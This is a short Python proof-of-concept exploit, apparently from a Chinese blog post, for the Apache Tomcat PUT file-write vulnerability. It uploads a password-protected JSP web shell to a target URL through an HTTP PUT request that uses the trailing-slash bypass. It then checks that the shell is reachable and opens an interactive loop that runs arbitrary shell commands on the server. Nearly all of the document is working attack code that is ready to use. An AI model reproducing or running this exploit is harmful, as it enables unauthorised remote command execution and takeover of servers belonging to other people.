import requests def title(): print('+------------------------------------------') print('+ \033[34mVersion: Tomcat PUT文件写入 \033[0m') print('+ \033[36m(Y/N) >>> 2023年5月23日 \033[0m') print('+ \033[36mcmd >>> ip addr \033[0m') print('+------------------------------------------') def poc_1(url,jsp): url1 = url + jsp body = '''<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>''' requests.put(url=url1, data=body) url2 = url1[:-1] qe = requests.get(url2) if qe.status_code == 200: print('漏洞存在,可执行命令') else: print('没有漏洞') def poc_2(url): try: while True: shell = input('$') reqw = requests.get(url+'?pwd=023&i='+shell) print(reqw.text) except: pass if __name__ == '__main__': title() url = input('$请输入目标url:') jsp = input('$请输入要保存的jsp文件:') poc_1(url,jsp) url1 = url + jsp url2 = url1[:-1] poc_2(url2)
tomcat_put写入POC.py
于 2023-06-07 15:48:23 首次发布